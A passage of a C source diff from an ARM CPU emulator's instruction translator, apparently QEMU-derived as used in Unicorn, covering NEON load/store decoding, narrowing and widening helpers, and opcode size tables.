/* Catch UNDEF cases for bad values of align field */ + switch (op & 0xc) { + case 4: + if (((insn >> 5) & 1) == 1) { + return 1; + } + break; + case 8: + if (((insn >> 4) & 3) == 3) { + return 1; + } + break; + default: + break; + } + nregs = neon_ls_element_type[op].nregs; + interleave = neon_ls_element_type[op].interleave; + spacing = neon_ls_element_type[op].spacing; + if (size == 3 && (interleave | spacing) != 1) + return 1; + addr = tcg_temp_new_i32(tcg_ctx); + load_reg_var(s, addr, rn); + stride = (1 << size) * interleave; + for (reg = 0; reg < nregs; reg++) { + if (interleave > 2 || (interleave == 2 && nregs == 2)) { + load_reg_var(s, addr, rn); + tcg_gen_addi_i32(tcg_ctx, addr, addr, (1 << size) * reg); + } else if (interleave == 2 && nregs == 4 && reg == 2) { + load_reg_var(s, addr, rn); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 1 << size); + } + if (size == 3) { + tmp64 = tcg_temp_new_i64(tcg_ctx); + if (load) { + gen_aa32_ld64(s, tmp64, addr, get_mem_index(s)); + neon_store_reg64(tcg_ctx, tmp64, rd); + } else { + neon_load_reg64(tcg_ctx, tmp64, rd); + gen_aa32_st64(s, tmp64, addr, get_mem_index(s)); + } + tcg_temp_free_i64(tcg_ctx, tmp64); + tcg_gen_addi_i32(tcg_ctx, addr, addr, stride); + } else { + for (pass = 0; pass < 2; pass++) { + if (size == 2) { + if (load) { + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + neon_store_reg(tcg_ctx, rd, pass, tmp); + } else { + tmp = neon_load_reg(tcg_ctx, rd, pass); + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_gen_addi_i32(tcg_ctx, addr, addr, stride); + } else if (size == 1) { + if (load) { + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + tcg_gen_addi_i32(tcg_ctx, addr, addr, stride); + tmp2 = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld16u(s, tmp2, addr, get_mem_index(s)); + tcg_gen_addi_i32(tcg_ctx, addr, addr, stride); + tcg_gen_shli_i32(tcg_ctx, tmp2, tmp2, 16); + tcg_gen_or_i32(tcg_ctx, tmp, tmp, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp2); + neon_store_reg(tcg_ctx, rd, pass, tmp); + } else { + tmp = neon_load_reg(tcg_ctx, rd, pass); + tmp2 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_shri_i32(tcg_ctx, tmp2, tmp, 16); + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, stride); + gen_aa32_st16(s, tmp2, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_gen_addi_i32(tcg_ctx, addr, addr, stride); + } + } else /* size == 0 */ { + if (load) { + TCGV_UNUSED_I32(tmp2); + for (n = 0; n < 4; n++) { + tmp = tcg_temp_new_i32(tcg_ctx); + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + tcg_gen_addi_i32(tcg_ctx, addr, addr, stride); + if (n == 0) { + tmp2 = tmp; + } else { + tcg_gen_shli_i32(tcg_ctx, tmp, tmp, n * 8); + tcg_gen_or_i32(tcg_ctx, tmp2, tmp2, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } + } + neon_store_reg(tcg_ctx, rd, pass, tmp2); + } else { + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + for (n = 0; n < 4; n++) { + tmp = tcg_temp_new_i32(tcg_ctx); + if (n == 0) { + tcg_gen_mov_i32(tcg_ctx, tmp, tmp2); + } else { + tcg_gen_shri_i32(tcg_ctx, tmp, tmp2, n * 8); + } + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, stride); + } + tcg_temp_free_i32(tcg_ctx, tmp2); + } + } + } + } + rd += spacing; + } + tcg_temp_free_i32(tcg_ctx, addr); + stride = nregs * 8; + } else { + size = (insn >> 10) & 3; + if (size == 3) { + /* Load single element to all lanes. */ + int a = (insn >> 4) & 1; + if (!load) { + return 1; + } + size = (insn >> 6) & 3; + nregs = ((insn >> 8) & 3) + 1; + + if (size == 3) { + if (nregs != 4 || a == 0) { + return 1; + } + /* For VLD4 size==3 a == 1 means 32 bits at 16 byte alignment */ + size = 2; + } + if (nregs == 1 && a == 1 && size == 0) { + return 1; + } + if (nregs == 3 && a == 1) { + return 1; + } + addr = tcg_temp_new_i32(tcg_ctx); + load_reg_var(s, addr, rn); + if (nregs == 1) { + /* VLD1 to all lanes: bit 5 indicates how many Dregs to write */ + tmp = gen_load_and_replicate(s, addr, size); + tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd, 0)); + tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd, 1)); + if (insn & (1 << 5)) { + tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd + 1, 0)); + tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd + 1, 1)); + } + tcg_temp_free_i32(tcg_ctx, tmp); + } else { + /* VLD2/3/4 to all lanes: bit 5 indicates register stride */ + stride = (insn & (1 << 5)) ? 2 : 1; + for (reg = 0; reg < nregs; reg++) { + tmp = gen_load_and_replicate(s, addr, size); + tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd, 0)); + tcg_gen_st_i32(tcg_ctx, tmp, tcg_ctx->cpu_env, neon_reg_offset(rd, 1)); + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_gen_addi_i32(tcg_ctx, addr, addr, 1 << size); + rd += stride; + } + } + tcg_temp_free_i32(tcg_ctx, addr); + stride = (1 << size) * nregs; + } else { + /* Single element. */ + int idx = (insn >> 4) & 0xf; + pass = (insn >> 7) & 1; + switch (size) { + case 0: + shift = ((insn >> 5) & 3) * 8; + stride = 1; + break; + case 1: + shift = ((insn >> 6) & 1) * 16; + stride = (insn & (1 << 5)) ? 2 : 1; + break; + case 2: + shift = 0; + stride = (insn & (1 << 6)) ? 2 : 1; + break; + default: + abort(); + } + nregs = ((insn >> 8) & 3) + 1; + /* Catch the UNDEF cases. This is unavoidably a bit messy. */ + switch (nregs) { + case 1: + if (((idx & (1 << size)) != 0) || + (size == 2 && ((idx & 3) == 1 || (idx & 3) == 2))) { + return 1; + } + break; + case 3: + if ((idx & 1) != 0) { + return 1; + } + /* fall through */ + case 2: + if (size == 2 && (idx & 2) != 0) { + return 1; + } + break; + case 4: + if ((size == 2) && ((idx & 3) == 3)) { + return 1; + } + break; + default: + abort(); + } + if ((rd + stride * (nregs - 1)) > 31) { + /* Attempts to write off the end of the register file + * are UNPREDICTABLE; we choose to UNDEF because otherwise + * the neon_load_reg() would write off the end of the array. + */ + return 1; + } + addr = tcg_temp_new_i32(tcg_ctx); + load_reg_var(s, addr, rn); + for (reg = 0; reg < nregs; reg++) { + if (load) { + tmp = tcg_temp_new_i32(tcg_ctx); + switch (size) { + case 0: + gen_aa32_ld8u(s, tmp, addr, get_mem_index(s)); + break; + case 1: + gen_aa32_ld16u(s, tmp, addr, get_mem_index(s)); + break; + case 2: + gen_aa32_ld32u(s, tmp, addr, get_mem_index(s)); + break; + default: /* Avoid compiler warnings. */ + abort(); + } + if (size != 2) { + tmp2 = neon_load_reg(tcg_ctx, rd, pass); + tcg_gen_deposit_i32(tcg_ctx, tmp, tmp2, tmp, + shift, size ? 16 : 8); + tcg_temp_free_i32(tcg_ctx, tmp2); + } + neon_store_reg(tcg_ctx, rd, pass, tmp); + } else { /* Store */ + tmp = neon_load_reg(tcg_ctx, rd, pass); + if (shift) + tcg_gen_shri_i32(tcg_ctx, tmp, tmp, shift); + switch (size) { + case 0: + gen_aa32_st8(s, tmp, addr, get_mem_index(s)); + break; + case 1: + gen_aa32_st16(s, tmp, addr, get_mem_index(s)); + break; + case 2: + gen_aa32_st32(s, tmp, addr, get_mem_index(s)); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp); + } + rd += stride; + tcg_gen_addi_i32(tcg_ctx, addr, addr, 1 << size); + } + tcg_temp_free_i32(tcg_ctx, addr); + stride = nregs * (1 << size); + } + } + if (rm != 15) { + TCGv_i32 base; + + base = load_reg(s, rn); + if (rm == 13) { + tcg_gen_addi_i32(tcg_ctx, base, base, stride); + } else { + TCGv_i32 index; + index = load_reg(s, rm); + tcg_gen_add_i32(tcg_ctx, base, base, index); + tcg_temp_free_i32(tcg_ctx, index); + } + store_reg(s, rn, base); + } + return 0; +} + +/* Bitwise select. dest = c ? t : f. Clobbers T and F. */ +static void gen_neon_bsl(DisasContext *s, TCGv_i32 dest, TCGv_i32 t, TCGv_i32 f, TCGv_i32 c) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_and_i32(tcg_ctx, t, t, c); + tcg_gen_andc_i32(tcg_ctx, f, f, c); + tcg_gen_or_i32(tcg_ctx, dest, t, f); +} + +static inline void gen_neon_narrow(DisasContext *s, int size, TCGv_i32 dest, TCGv_i64 src) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (size) { + case 0: gen_helper_neon_narrow_u8(tcg_ctx, dest, src); break; + case 1: gen_helper_neon_narrow_u16(tcg_ctx, dest, src); break; + case 2: tcg_gen_trunc_i64_i32(tcg_ctx, dest, src); break; + default: abort(); + } +} + +static inline void gen_neon_narrow_sats(DisasContext *s, int size, TCGv_i32 dest, TCGv_i64 src) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (size) { + case 0: gen_helper_neon_narrow_sat_s8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; + case 1: gen_helper_neon_narrow_sat_s16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; + case 2: gen_helper_neon_narrow_sat_s32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; + default: abort(); + } +} + +static inline void gen_neon_narrow_satu(DisasContext *s, int size, TCGv_i32 dest, TCGv_i64 src) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (size) { + case 0: gen_helper_neon_narrow_sat_u8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; + case 1: gen_helper_neon_narrow_sat_u16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; + case 2: gen_helper_neon_narrow_sat_u32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; + default: abort(); + } +} + +static inline void gen_neon_unarrow_sats(DisasContext *s, int size, TCGv_i32 dest, TCGv_i64 src) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (size) { + case 0: gen_helper_neon_unarrow_sat8(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; + case 1: gen_helper_neon_unarrow_sat16(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; + case 2: gen_helper_neon_unarrow_sat32(tcg_ctx, dest, tcg_ctx->cpu_env, src); break; + default: abort(); + } +} + +static inline void gen_neon_shift_narrow(DisasContext *s, int size, TCGv_i32 var, TCGv_i32 shift, + int q, int u) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (q) { + if (u) { + switch (size) { + case 1: gen_helper_neon_rshl_u16(tcg_ctx, var, var, shift); break; + case 2: gen_helper_neon_rshl_u32(tcg_ctx, var, var, shift); break; + default: abort(); + } + } else { + switch (size) { + case 1: gen_helper_neon_rshl_s16(tcg_ctx, var, var, shift); break; + case 2: gen_helper_neon_rshl_s32(tcg_ctx, var, var, shift); break; + default: abort(); + } + } + } else { + if (u) { + switch (size) { + case 1: gen_helper_neon_shl_u16(tcg_ctx, var, var, shift); break; + case 2: gen_helper_neon_shl_u32(tcg_ctx, var, var, shift); break; + default: abort(); + } + } else { + switch (size) { + case 1: gen_helper_neon_shl_s16(tcg_ctx, var, var, shift); break; + case 2: gen_helper_neon_shl_s32(tcg_ctx, var, var, shift); break; + default: abort(); + } + } + } +} + +static inline void gen_neon_widen(DisasContext *s, TCGv_i64 dest, TCGv_i32 src, int size, int u) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (u) { + switch (size) { + case 0: gen_helper_neon_widen_u8(tcg_ctx, dest, src); break; + case 1: gen_helper_neon_widen_u16(tcg_ctx, dest, src); break; + case 2: tcg_gen_extu_i32_i64(tcg_ctx, dest, src); break; + default: abort(); + } + } else { + switch (size) { + case 0: gen_helper_neon_widen_s8(tcg_ctx, dest, src); break; + case 1: gen_helper_neon_widen_s16(tcg_ctx, dest, src); break; + case 2: tcg_gen_ext_i32_i64(tcg_ctx, dest, src); break; + default: abort(); + } + } + tcg_temp_free_i32(tcg_ctx, src); +} + +static inline void gen_neon_addl(DisasContext *s, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (size) { + case 0: gen_helper_neon_addl_u16(tcg_ctx, CPU_V001); break; + case 1: gen_helper_neon_addl_u32(tcg_ctx, CPU_V001); break; + case 2: tcg_gen_add_i64(tcg_ctx, CPU_V001); break; + default: abort(); + } +} + +static inline void gen_neon_subl(DisasContext *s, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (size) { + case 0: gen_helper_neon_subl_u16(tcg_ctx, CPU_V001); break; + case 1: gen_helper_neon_subl_u32(tcg_ctx, CPU_V001); break; + case 2: tcg_gen_sub_i64(tcg_ctx, CPU_V001); break; + default: abort(); + } +} + +static inline void gen_neon_negl(DisasContext *s, TCGv_i64 var, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (size) { + case 0: gen_helper_neon_negl_u16(tcg_ctx, var, var); break; + case 1: gen_helper_neon_negl_u32(tcg_ctx, var, var); break; + case 2: + tcg_gen_neg_i64(tcg_ctx, var, var); + break; + default: abort(); + } +} + +static inline void gen_neon_addl_saturate(DisasContext *s, TCGv_i64 op0, TCGv_i64 op1, int size) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + switch (size) { + case 1: gen_helper_neon_addl_saturate_s32(tcg_ctx, op0, tcg_ctx->cpu_env, op0, op1); break; + case 2: gen_helper_neon_addl_saturate_s64(tcg_ctx, op0, tcg_ctx->cpu_env, op0, op1); break; + default: abort(); + } +} + +static inline void gen_neon_mull(DisasContext *s, TCGv_i64 dest, TCGv_i32 a, TCGv_i32 b, + int size, int u) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tmp; + + switch ((size << 1) | u) { + case 0: gen_helper_neon_mull_s8(tcg_ctx, dest, a, b); break; + case 1: gen_helper_neon_mull_u8(tcg_ctx, dest, a, b); break; + case 2: gen_helper_neon_mull_s16(tcg_ctx, dest, a, b); break; + case 3: gen_helper_neon_mull_u16(tcg_ctx, dest, a, b); break; + case 4: + tmp = gen_muls_i64_i32(s, a, b); + tcg_gen_mov_i64(tcg_ctx, dest, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); + break; + case 5: + tmp = gen_mulu_i64_i32(s, a, b); + tcg_gen_mov_i64(tcg_ctx, dest, tmp); + tcg_temp_free_i64(tcg_ctx, tmp); + break; + default: abort(); + } + + /* gen_helper_neon_mull_[su]{8|16} do not free their parameters. + Don't forget to clean them now. */ + if (size < 2) { + tcg_temp_free_i32(tcg_ctx, a); + tcg_temp_free_i32(tcg_ctx, b); + } +} + +static void gen_neon_narrow_op(DisasContext *s, int op, int u, int size, + TCGv_i32 dest, TCGv_i64 src) +{ + if (op) { + if (u) { + gen_neon_unarrow_sats(s, size, dest, src); + } else { + gen_neon_narrow(s, size, dest, src); + } + } else { + if (u) { + gen_neon_narrow_satu(s, size, dest, src); + } else { + gen_neon_narrow_sats(s, size, dest, src); + } + } +} + +/* Symbolic constants for op fields for Neon 3-register same-length. + * The values correspond to bits [11:8,4]; see the ARM ARM DDI0406B + * table A7-9. + */ +#define NEON_3R_VHADD 0 +#define NEON_3R_VQADD 1 +#define NEON_3R_VRHADD 2 +#define NEON_3R_LOGIC 3 /* VAND,VBIC,VORR,VMOV,VORN,VEOR,VBIF,VBIT,VBSL */ +#define NEON_3R_VHSUB 4 +#define NEON_3R_VQSUB 5 +#define NEON_3R_VCGT 6 +#define NEON_3R_VCGE 7 +#define NEON_3R_VSHL 8 +#define NEON_3R_VQSHL 9 +#define NEON_3R_VRSHL 10 +#define NEON_3R_VQRSHL 11 +#define NEON_3R_VMAX 12 +#define NEON_3R_VMIN 13 +#define NEON_3R_VABD 14 +#define NEON_3R_VABA 15 +#define NEON_3R_VADD_VSUB 16 +#define NEON_3R_VTST_VCEQ 17 +#define NEON_3R_VML 18 /* VMLA, VMLAL, VMLS, VMLSL */ +#define NEON_3R_VMUL 19 +#define NEON_3R_VPMAX 20 +#define NEON_3R_VPMIN 21 +#define NEON_3R_VQDMULH_VQRDMULH 22 +#define NEON_3R_VPADD 23 +#define NEON_3R_SHA 24 /* SHA1C,SHA1P,SHA1M,SHA1SU0,SHA256H{2},SHA256SU1 */ +#define NEON_3R_VFM 25 /* VFMA, VFMS : float fused multiply-add */ +#define NEON_3R_FLOAT_ARITH 26 /* float VADD, VSUB, VPADD, VABD */ +#define NEON_3R_FLOAT_MULTIPLY 27 /* float VMLA, VMLS, VMUL */ +#define NEON_3R_FLOAT_CMP 28 /* float VCEQ, VCGE, VCGT */ +#define NEON_3R_FLOAT_ACMP 29 /* float VACGE, VACGT, VACLE, VACLT */ +#define NEON_3R_FLOAT_MINMAX 30 /* float VMIN, VMAX */ +#define NEON_3R_FLOAT_MISC 31 /* float VRECPS, VRSQRTS, VMAXNM/MINNM */ + +static const uint8_t neon_3r_sizes[] = { + /*NEON_3R_VHADD*/ 0x7, + /*NEON_3R_VQADD*/ 0xf, + /*NEON_3R_VRHADD*/ 0x7, + /*NEON_3R_LOGIC*/ 0xf, /* size field encodes op type */ + /*NEON_3R_VHSUB*/ 0x7, + /*NEON_3R_VQSUB*/ 0xf, + /*NEON_3R_VCGT*/ 0x7, + /*NEON_3R_VCGE*/ 0x7, + /*NEON_3R_VSHL*/ 0xf, + /*NEON_3R_VQSHL*/ 0xf, + /*NEON_3R_VRSHL*/ 0xf, + /*NEON_3R_VQRSHL*/ 0xf, + /*NEON_3R_VMAX*/ 0x7, + /*NEON_3R_VMIN*/ 0x7, + /*NEON_3R_VABD*/ 0x7, + /*NEON_3R_VABA*/ 0x7, + /*NEON_3R_VADD_VSUB*/ 0xf, + /*NEON_3R_VTST_VCEQ*/ 0x7, + /*NEON_3R_VML*/ 0x7, + /*NEON_3R_VMUL*/ 0x7, + /*NEON_3R_VPMAX*/ 0x7, + /*NEON_3R_VPMIN*/ 0x7, + /*NEON_3R_VQDMULH_VQRDMULH*/ 0x6, + /*NEON_3R_VPADD*/ 0x7, + /*NEON_3R_SHA*/ 0xf, /* size field encodes op type */ + /*NEON_3R_VFM*/ 0x5, /* size bit 1 encodes op */ + /*NEON_3R_FLOAT_ARITH*/ 0x5, /* size bit 1 encodes op */ + /*NEON_3R_FLOAT_MULTIPLY*/ 0x5, /* size bit 1 encodes op */ + /*NEON_3R_FLOAT_CMP*/ 0x5, /* size bit 1 encodes op */ + /*NEON_3R_FLOAT_ACMP*/ 0x5, /* size bit 1 encodes op */ + /*NEON_3R_FLOAT_MINMAX*/ 0x5, /* size bit 1 encodes op */ + /*NEON_3R_FLOAT_MISC*/ 0x5, /* size bit 1 encodes op */ +}; + +/* Symbolic constants for op fields for Neon 2-register miscellaneous. + * The values correspond to bits [17:16,10:7]; see the ARM ARM DDI0406B + * table A7-13. + */ +#define NEON_2RM_VREV64 0 +#define NEON_2RM_VREV32 1 +#define NEON_2RM_VREV16 2 +#define NEON_2RM_VPADDL 4 +#define NEON_2RM_VPADDL_U 5 +#define NEON_2RM_AESE 6 /* Includes AESD */ +#define NEON_2RM_AESMC 7 /* Includes AESIMC */ +#define NEON_2RM_VCLS 8 +#define NEON_2RM_VCLZ 9 +#define NEON_2RM_VCNT 10 +#define NEON_2RM_VMVN 11 +#define NEON_2RM_VPADAL 12 +#define NEON_2RM_VPADAL_U 13 +#define NEON_2RM_VQABS 14 +#define NEON_2RM_VQNEG 15 +#define NEON_2RM_VCGT0 16 +#define NEON_2RM_VCGE0 17 +#define NEON_2RM_VCEQ0 18 +#define NEON_2RM_VCLE0 19 +#define NEON_2RM_VCLT0 20 +#define NEON_2RM_SHA1H 21 +#define NEON_2RM_VABS 22 +#define NEON_2RM_VNEG 23 +#define NEON_2RM_VCGT0_F 24 +#define NEON_2RM_VCGE0_F 25 +#define NEON_2RM_VCEQ0_F 26 +#define NEON_2RM_VCLE0_F 27 +#define NEON_2RM_VCLT0_F 28 +#define NEON_2RM_VABS_F 30 +#define NEON_2RM_VNEG_F 31 +#define NEON_2RM_VSWP 32 +#define NEON_2RM_VTRN 33 +#define NEON_2RM_VUZP 34 +#define NEON_2RM_VZIP 35 +#define NEON_2RM_VMOVN 36 /* Includes VQMOVN, VQMOVUN */ +#define NEON_2RM_VQMOVN 37 /* Includes VQMOVUN */ +#define NEON_2RM_VSHLL 38 +#define NEON_2RM_SHA1SU1 39 /* Includes SHA256SU0 */ +#define NEON_2RM_VRINTN 40 +#define NEON_2RM_VRINTX 41 +#define NEON_2RM_VRINTA 42 +#define NEON_2RM_VRINTZ 43 +#define NEON_2RM_VCVT_F16_F32 44 +#define NEON_2RM_VRINTM 45 +#define NEON_2RM_VCVT_F32_F16 46 +#define NEON_2RM_VRINTP 47 +#define NEON_2RM_VCVTAU 48 +#define NEON_2RM_VCVTAS 49 +#define NEON_2RM_VCVTNU 50 +#define NEON_2RM_VCVTNS 51 +#define NEON_2RM_VCVTPU 52 +#define NEON_2RM_VCVTPS 53 +#define NEON_2RM_VCVTMU 54 +#define NEON_2RM_VCVTMS 55 +#define NEON_2RM_VRECPE 56 +#define NEON_2RM_VRSQRTE 57 +#define NEON_2RM_VRECPE_F 58 +#define NEON_2RM_VRSQRTE_F 59 +#define NEON_2RM_VCVT_FS 60 +#define NEON_2RM_VCVT_FU 61 +#define NEON_2RM_VCVT_SF 62 +#define NEON_2RM_VCVT_UF 63 + +static int neon_2rm_is_float_op(int op) +{ + /* Return true if this neon 2reg-misc op is float-to-float */ + return (op == NEON_2RM_VABS_F || op == NEON_2RM_VNEG_F || + (op >= NEON_2RM_VRINTN && op <= NEON_2RM_VRINTZ) || + op == NEON_2RM_VRINTM || + (op >= NEON_2RM_VRINTP && op <= NEON_2RM_VCVTMS) || + op >= NEON_2RM_VRECPE_F); +} + +/* Each entry in this array has bit n set if the insn allows + * size value n (otherwise it will UNDEF). Since unallocated + * op values will have no bits set they always UNDEF. + */ +static const uint8_t neon_2rm_sizes[] = { + /*NEON_2RM_VREV64*/ 0x7, + /*NEON_2RM_VREV32*/ 0x3, + /*NEON_2RM_VREV16*/ 0x1, + 0, + /*NEON_2RM_VPADDL*/ 0x7, + /*NEON_2RM_VPADDL_U*/ 0x7, + /*NEON_2RM_AESE*/ 0x1, + /*NEON_2RM_AESMC*/ 0x1, + /*NEON_2RM_VCLS*/ 0x7, + /*NEON_2RM_VCLZ*/ 0x7, + /*NEON_2RM_VCNT*/ 0x1, + /*NEON_2RM_VMVN*/ 0x1, + /*NEON_2RM_VPADAL*/ 0x7, + /*NEON_2RM_VPADAL_U*/ 0x7, + /*NEON_2RM_VQABS*/ 0x7, + /*NEON_2RM_VQNEG*/ 0x7, + /*NEON_2RM_VCGT0*/ 0x7, + /*NEON_2RM_VCGE0*/ 0x7, + /*NEON_2RM_VCEQ0*/ 0x7, + /*NEON_2RM_VCLE0*/ 0x7, + /*NEON_2RM_VCLT0*/ 0x7, + /*NEON_2RM_SHA1H*/ 0x4, + /*NEON_2RM_VABS*/ 0x7, + /*NEON_2RM_VNEG*/ 0x7, + /*NEON_2RM_VCGT0_F*/ 0x4, + /*NEON_2RM_VCGE0_F*/ 0x4, + /*NEON_2RM_VCEQ0_F*/ 0x4, + /*NEON_2RM_VCLE0_F*/ 0x4, + /*NEON_2RM_VCLT0_F*/ 0x4, + 0, + /*NEON_2RM_VABS_F*/ 0x4, + /*NEON_2RM_VNEG_F*/ 0x4, + /*NEON_2RM_VSWP*/ 0x1, + /*NEON_2RM_VTRN*/ 0x7, + /*NEON_2RM_VUZP*/ 0x7, + /*NEON_2RM_VZIP*/ 0x7, + /*NEON_2RM_VMOVN*/ 0x7, + /*NEON_2RM_VQMOVN*/ 0x7, + /*NEON_2RM_VSHLL*/ 0x7, + /*NEON_2RM_SHA1SU1*/ 0x4, + /*NEON_2RM_VRINTN*/ 0x4, + /*NEON_2RM_VRINTX*/ 0x4, + /*NEON_2RM_VRINTA*/ 0x4, + /*NEON_2RM_VRINTZ*/ 0x4, + /*NEON_2RM_VCVT_F16_F32*/ 0x2, + /*NEON_2RM_VRINTM*/ 0x4, + /*NEON_2RM_VCVT_F32_F16*/ 0x2, + /*NEON_2RM_VRINTP*/ 0x4, + /*NEON_2RM_VCVTAU*/ 0x4, + /*NEON_2RM_VCVTAS*/ 0x4, + /*NEON_2RM_VCVTNU*/ 0x4, + /*NEON_2RM_VCVTNS*/ 0x4, + /*NEON_2RM_VCVTPU*/ 0x4, + /*NEON_2RM_VCVTPS*/ 0x4, + /*NEON_2RM_VCVTMU*/ 0x4, + /*NEON_2RM_VCVTMS*/ 0x4, + /*NEON_2RM_VRECPE*/ 0x4, + /*NEON_2RM_VRSQRTE*/ 0x4, + /*NEON_2RM_VRECPE_F*/ 0x4, + /*NEON_2RM_VRSQRTE_F*/ 0x4, + /*NEON_2RM_VCVT_FS*/ 0x4, + /*NEON_2RM_VCVT_FU*/ 0x4, + /*NEON_2RM_VCVT_SF*/ 0x4, + /*NEON_2RM_VCVT_UF*/ 0x4, +}; + +/* Translate a NEON data processing instruction. Return nonzero if the + instruction is invalid. + We process data in a mixture of 32-bit and 64-bit chunks. + Mostly we use 32-bit chunks so we can use normal scalar instructions. */ + +static int disas_neon_data_insn(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int op; + int q; + int rd, rn, rm; + int size; + int shift; + int pass; + int count; + int pairwise; + int u; + uint32_t imm, mask; + TCGv_i32 tmp, tmp2, tmp3, tmp4, tmp5; + TCGv_i64 tmp64; + + /* FIXME: this access check should not take precedence over UNDEF + * for invalid encodings; we will generate incorrect syndrome information + * for attempts to execute invalid vfp/neon encodings with FP disabled. + */ + if (!s->cpacr_fpen) { + gen_exception_insn(s, 4, EXCP_UDEF, + syn_fp_access_trap(1, 0xe, s->thumb)); + return 0; + } + + if (!s->vfp_enabled) + return 1; + q = (insn & (1 << 6)) != 0; + u = (insn >> 24) & 1; + VFP_DREG_D(rd, insn); + VFP_DREG_N(rn, insn); + VFP_DREG_M(rm, insn); + size = (insn >> 20) & 3; + if ((insn & (1 << 23)) == 0) { + /* Three register same length. */ + op = ((insn >> 7) & 0x1e) | ((insn >> 4) & 1); + /* Catch invalid op and bad size combinations: UNDEF */ + if ((neon_3r_sizes[op] & (1 << size)) == 0) { + return 1; + } + /* All insns of this form UNDEF for either this condition or the + * superset of cases "Q==1"; we catch the latter later. + */ + if (q && ((rd | rn | rm) & 1)) { + return 1; + } + /* + * The SHA-1/SHA-256 3-register instructions require special treatment + * here, as their size field is overloaded as an op type selector, and + * they all consume their input in a single pass. + */ + if (op == NEON_3R_SHA) { + if (!q) { + return 1; + } + if (!u) { /* SHA-1 */ + if (!arm_dc_feature(s, ARM_FEATURE_V8_SHA1)) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rn); + tmp3 = tcg_const_i32(tcg_ctx, rm); + tmp4 = tcg_const_i32(tcg_ctx, size); + gen_helper_crypto_sha1_3reg(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3, tmp4); + tcg_temp_free_i32(tcg_ctx, tmp4); + } else { /* SHA-256 */ + if (!arm_dc_feature(s, ARM_FEATURE_V8_SHA256) || size == 3) { + return 1; + } + tmp = tcg_const_i32(tcg_ctx, rd); + tmp2 = tcg_const_i32(tcg_ctx, rn); + tmp3 = tcg_const_i32(tcg_ctx, rm); + switch (size) { + case 0: + gen_helper_crypto_sha256h(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3); + break; + case 1: + gen_helper_crypto_sha256h2(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3); + break; + case 2: + gen_helper_crypto_sha256su1(tcg_ctx, tcg_ctx->cpu_env, tmp, tmp2, tmp3); + break; + } + } + tcg_temp_free_i32(tcg_ctx, tmp); + tcg_temp_free_i32(tcg_ctx, tmp2); + tcg_temp_free_i32(tcg_ctx, tmp3); + return 0; + } + if (size == 3 && op != NEON_3R_LOGIC) { + /* 64-bit element instructions. */ + for (pass = 0; pass < (q ? 2 : 1); pass++) { + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V0, rn + pass); + neon_load_reg64(tcg_ctx, tcg_ctx->cpu_V1, rm + pass); + switch (op) { + case NEON_3R_VQADD: + if (u) { + gen_helper_neon_qadd_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } else { + gen_helper_neon_qadd_s64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, tcg_ctx->cpu_V1); + } + break; + case NEON_3R_VQSUB: + if (u) { + gen_helper_neon_qsub_u64(tcg_ctx, tcg_ctx->cpu_V0, tcg_ctx->cpu_env, + tcg_ctx->cpu_V0, 